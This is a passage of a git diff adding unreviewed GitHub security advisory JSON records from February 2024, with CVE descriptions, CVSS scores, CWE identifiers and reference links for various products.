"https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4hrc-358r-qjm4/GHSA-4hrc-358r-qjm4.json b/advisories/unreviewed/2024/02/GHSA-4hrc-358r-qjm4/GHSA-4hrc-358r-qjm4.json new file mode 100644 index 0000000000000..f284652f1c12b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4hrc-358r-qjm4/GHSA-4hrc-358r-qjm4.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4hrc-358r-qjm4", + "modified": "2024-02-04T06:30:20Z", + "published": "2024-02-04T06:30:20Z", + "aliases": [ + "CVE-2015-10129" + ], + "details": "A vulnerability was found in planet-freo up to 20150116 and classified as problematic. Affected by this issue is some unknown functionality of the file admin/inc/auth.inc.php. The manipulation of the argument auth leads to incorrect comparison. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 6ad38c58a45642eb8c7844e2f272ef199f59550d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-252716.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10129" + }, + { + "type": "WEB", + "url": "https://github.com/samwilson/planet-freo/commit/6ad38c58a45642eb8c7844e2f272ef199f59550d" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252716" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252716" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-697" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T05:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4j4p-q978-922r/GHSA-4j4p-q978-922r.json b/advisories/unreviewed/2024/02/GHSA-4j4p-q978-922r/GHSA-4j4p-q978-922r.json new file mode 100644 index 0000000000000..b6b7c434bbab3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4j4p-q978-922r/GHSA-4j4p-q978-922r.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4j4p-q978-922r", + "modified": "2024-02-06T00:30:28Z", + "published": "2024-02-06T00:30:28Z", + "aliases": [ + "CVE-2023-47354" + ], + "details": "An issue in the PowerOffWidgetReceiver function of Super Reboot (Root) Recovery v1.0.3 allows attackers to arbitrarily reset or power off the device via a crafted intent", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47354" + }, + { + "type": "WEB", + "url": "https://github.com/actuator/com.bdrm.superreboot/blob/main/CWE-925.md" + }, + { + "type": "WEB", + "url": "https://play.google.com/store/apps/details?id=com.bdrm.superreboot" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4m5c-7v8f-8p2q/GHSA-4m5c-7v8f-8p2q.json b/advisories/unreviewed/2024/02/GHSA-4m5c-7v8f-8p2q/GHSA-4m5c-7v8f-8p2q.json new file mode 100644 index 0000000000000..78a1c062152e5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4m5c-7v8f-8p2q/GHSA-4m5c-7v8f-8p2q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4m5c-7v8f-8p2q", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-22819" + ], + "details": "An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability. This issue affects My Cloud Home and My Cloud Home Duo: before 9.5.1-104; ibi: before 9.5.1-104; My Cloud OS 5: before 5.27.161.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22819" + }, + { + "type": "WEB", + "url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4mgq-44rj-x22r/GHSA-4mgq-44rj-x22r.json b/advisories/unreviewed/2024/02/GHSA-4mgq-44rj-x22r/GHSA-4mgq-44rj-x22r.json new file mode 100644 index 0000000000000..10eaa502afce9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4mgq-44rj-x22r/GHSA-4mgq-44rj-x22r.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mgq-44rj-x22r", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41273" + ], + "details": "A heap-based buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41273" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120", + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4qgw-xmfm-r629/GHSA-4qgw-xmfm-r629.json b/advisories/unreviewed/2024/02/GHSA-4qgw-xmfm-r629/GHSA-4qgw-xmfm-r629.json new file mode 100644 index 0000000000000..999233a01db3c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4qgw-xmfm-r629/GHSA-4qgw-xmfm-r629.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4qgw-xmfm-r629", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2024-22984" + ], + "details": "Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22984" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T20:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4qjq-wqw7-p79p/GHSA-4qjq-wqw7-p79p.json b/advisories/unreviewed/2024/02/GHSA-4qjq-wqw7-p79p/GHSA-4qjq-wqw7-p79p.json new file mode 100644 index 0000000000000..a5d030431254a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4qjq-wqw7-p79p/GHSA-4qjq-wqw7-p79p.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4qjq-wqw7-p79p", + "modified": "2024-02-03T03:30:28Z", + "published": "2024-02-03T03:30:28Z", + "aliases": [ + "CVE-2024-1200" + ], + "details": "A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /template/1/default/. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252698 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1200" + }, + { + "type": "WEB", + "url": "https://github.com/sweatxi/BugHub/blob/main/Nanchang%20Lanzhi%20Technology%20Co.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252698" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252698" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T02:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4rgm-786j-w9cc/GHSA-4rgm-786j-w9cc.json b/advisories/unreviewed/2024/02/GHSA-4rgm-786j-w9cc/GHSA-4rgm-786j-w9cc.json new file mode 100644 index 0000000000000..9fc8562495356 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4rgm-786j-w9cc/GHSA-4rgm-786j-w9cc.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rgm-786j-w9cc", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-1046" + ], + "details": "The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin 'reg-number-field' shortcode in all versions up to, and including, 4.14.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1046" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3030229/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7911c774-3fb0-4d6c-a847-101e5ad8637a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4v2m-666w-ffm3/GHSA-4v2m-666w-ffm3.json b/advisories/unreviewed/2024/02/GHSA-4v2m-666w-ffm3/GHSA-4v2m-666w-ffm3.json new file mode 100644 index 0000000000000..37cbf96cdff2c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4v2m-666w-ffm3/GHSA-4v2m-666w-ffm3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4v2m-666w-ffm3", + "modified": "2024-02-05T18:31:37Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-0323" + ], + "details": "Use of a Broken or Risky Cryptographic Algorithm vulnerability in B&R Industrial Automation Automation Runtime (SDM modules).\n\n\n\nThe FTP server used on the B&R\nAutomation Runtime supports unsecure encryption mechanisms, such as SSLv3,\nTLSv1.0 and TLS1.1. An network-based attacker can exploit the flaws to conduct\nman-in-the-middle attacks or to decrypt communications between the affected product\nclients.  \n\nThis issue affects Automation Runtime: from 14.0 before 14.93.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0323" + }, + { + "type": "WEB", + "url": "https://www.br-automation.com/fileadmin/SA23P004_FTP_uses_unsecure_encryption_mechanisms-f57c147c.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T16:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4vg6-rrvh-fpmr/GHSA-4vg6-rrvh-fpmr.json b/advisories/unreviewed/2024/02/GHSA-4vg6-rrvh-fpmr/GHSA-4vg6-rrvh-fpmr.json new file mode 100644 index 0000000000000..f5b3ad6b72e1d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4vg6-rrvh-fpmr/GHSA-4vg6-rrvh-fpmr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4vg6-rrvh-fpmr", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-24059" + ], + "details": "springboot-manager v1.6 is vulnerable to Arbitrary File Upload. The system does not filter the suffixes of uploaded files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24059" + }, + { + "type": "WEB", + "url": "https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#2-file-upload-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T14:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4vq7-3qhw-47p6/GHSA-4vq7-3qhw-47p6.json b/advisories/unreviewed/2024/02/GHSA-4vq7-3qhw-47p6/GHSA-4vq7-3qhw-47p6.json new file mode 100644 index 0000000000000..d45205ecf42e3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4vq7-3qhw-47p6/GHSA-4vq7-3qhw-47p6.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4vq7-3qhw-47p6", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24215" + ], + "details": "An issue in the component /cgi-bin/GetJsonValue.cgi of Cellinx NVT Web Server 5.0.0.014 allows attackers to leak configuration information via a crafted POST request.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24215" + }, + { + "type": "WEB", + "url": "https://github.com/940198871/Vulnerability-details/blob/main/CVE-2024-24215" + }, + { + "type": "WEB", + "url": "https://reference3.example.com//1.222.228.4/%2C" + }, + { + "type": "WEB", + "url": "https://reference4.example.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4w35-3gj2-cc52/GHSA-4w35-3gj2-cc52.json b/advisories/unreviewed/2024/02/GHSA-4w35-3gj2-cc52/GHSA-4w35-3gj2-cc52.json new file mode 100644 index 0000000000000..7464849d96439 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4w35-3gj2-cc52/GHSA-4w35-3gj2-cc52.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4w35-3gj2-cc52", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-1260" + ], + "details": "A vulnerability classified as critical has been found in Juanpao JPShop up to 1.5.02. This affects the function actionIndex of the file /api/controllers/admin/app/ComboController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252999.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1260" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/H73DuWdyifaI" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252999" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252999" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4w42-hx2p-m2jw/GHSA-4w42-hx2p-m2jw.json b/advisories/unreviewed/2024/02/GHSA-4w42-hx2p-m2jw/GHSA-4w42-hx2p-m2jw.json new file mode 100644 index 0000000000000..225ecc07bd1ce --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4w42-hx2p-m2jw/GHSA-4w42-hx2p-m2jw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4w42-hx2p-m2jw", + "modified": "2024-02-06T12:30:31Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-24938" + ], + "details": "In JetBrains TeamCity before 2023.11.2 limited directory traversal was possible in the Kotlin DSL documentation", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24938" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4x63-78pq-hqc9/GHSA-4x63-78pq-hqc9.json b/advisories/unreviewed/2024/02/GHSA-4x63-78pq-hqc9/GHSA-4x63-78pq-hqc9.json new file mode 100644 index 0000000000000..e752cd7380956 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4x63-78pq-hqc9/GHSA-4x63-78pq-hqc9.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4x63-78pq-hqc9", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2023-7077" + ], + "details": "Sharp NEC Displays (P403, P463, P553, P703, P801, X554UN, X464UN, X554UNS, X464UNV, X474HB, X464UNS, X554UNV, X555UNS, X555UNV, X754HB, X554HB, E705, E805, E905, UN551S, UN551VS, X551UHD, X651UHD, X841UHD, X981UHD, MD551C8) allows an attacker execute remote code by sending unintended parameters in http request.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7077" + }, + { + "type": "WEB", + "url": "https://www.sharp-nec-displays.com/global/support/info/A4_vulnerability.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4xm5-m6gw-q5w5/GHSA-4xm5-m6gw-q5w5.json b/advisories/unreviewed/2024/02/GHSA-4xm5-m6gw-q5w5/GHSA-4xm5-m6gw-q5w5.json new file mode 100644 index 0000000000000..be3906f64720a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4xm5-m6gw-q5w5/GHSA-4xm5-m6gw-q5w5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4xm5-m6gw-q5w5", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2024-0685" + ], + "details": "The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Second Order SQL Injection via the email address value submitted through forms in all versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to inject SQL in their email address that will append additional into the already existing query when an administrator triggers a personal data export.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0685" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3028929/ninja-forms/trunk/includes/Admin/UserDataRequests.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T05:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5233-h8c5-6rmx/GHSA-5233-h8c5-6rmx.json b/advisories/unreviewed/2024/02/GHSA-5233-h8c5-6rmx/GHSA-5233-h8c5-6rmx.json new file mode 100644 index 0000000000000..2cf531713084a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5233-h8c5-6rmx/GHSA-5233-h8c5-6rmx.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5233-h8c5-6rmx", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6884" + ], + "details": "This plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on the 'place_id' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6884" + }, + { + "type": "WEB", + "url": "https://advisory.abay.sh/cve-2023-6884" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/widget-google-reviews/tags/3.1/includes/class-feed-shortcode.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3018964%40widget-google-reviews&new=3018964%40widget-google-reviews&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a8971d54-b54e-4e62-9db2-fa87d2564599?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-52rw-98p2-v2g3/GHSA-52rw-98p2-v2g3.json b/advisories/unreviewed/2024/02/GHSA-52rw-98p2-v2g3/GHSA-52rw-98p2-v2g3.json new file mode 100644 index 0000000000000..24b3a7cee0f6c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-52rw-98p2-v2g3/GHSA-52rw-98p2-v2g3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-52rw-98p2-v2g3", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51520" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPdevelop / Oplugins WP Booking Calendar allows Stored XSS.This issue affects WP Booking Calendar: from n/a before 9.7.4.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51520" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/booking/wordpress-booking-calendar-plugin-9-7-4-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T12:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-52vv-5jc5-5gmv/GHSA-52vv-5jc5-5gmv.json b/advisories/unreviewed/2024/02/GHSA-52vv-5jc5-5gmv/GHSA-52vv-5jc5-5gmv.json new file mode 100644 index 0000000000000..5ba3abe3d30aa --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-52vv-5jc5-5gmv/GHSA-52vv-5jc5-5gmv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-52vv-5jc5-5gmv", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-43516" + ], + "details": "Memory corruption when malformed message payload is received from firmware.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43516" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-533p-5wv5-6gqg/GHSA-533p-5wv5-6gqg.json b/advisories/unreviewed/2024/02/GHSA-533p-5wv5-6gqg/GHSA-533p-5wv5-6gqg.json new file mode 100644 index 0000000000000..60cdd84957ee2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-533p-5wv5-6gqg/GHSA-533p-5wv5-6gqg.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-533p-5wv5-6gqg", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-22394" + ], + "details": "An improper authentication vulnerability has been identified in SonicWall SonicOS SSL-VPN feature, which in specific conditions could allow a remote attacker to bypass authentication. \n\nThis issue affects only firmware version SonicOS 7.1.1-7040.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22394" + }, + { + "type": "WEB", + "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0003" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T02:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-548x-pj87-qv7f/GHSA-548x-pj87-qv7f.json b/advisories/unreviewed/2024/02/GHSA-548x-pj87-qv7f/GHSA-548x-pj87-qv7f.json new file mode 100644 index 0000000000000..2f975024bd2bf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-548x-pj87-qv7f/GHSA-548x-pj87-qv7f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-548x-pj87-qv7f", + "modified": "2024-02-01T15:30:24Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-0935" + ], + "details": "An insertion of Sensitive Information into Log File vulnerability is affecting DELMIA Apriso Release 2019 through Release 2024", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0935" + }, + { + "type": "WEB", + "url": "https://www.3ds.com/vulnerability/advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T14:15:56Z" + } +} \ No newline at end of file diff --git 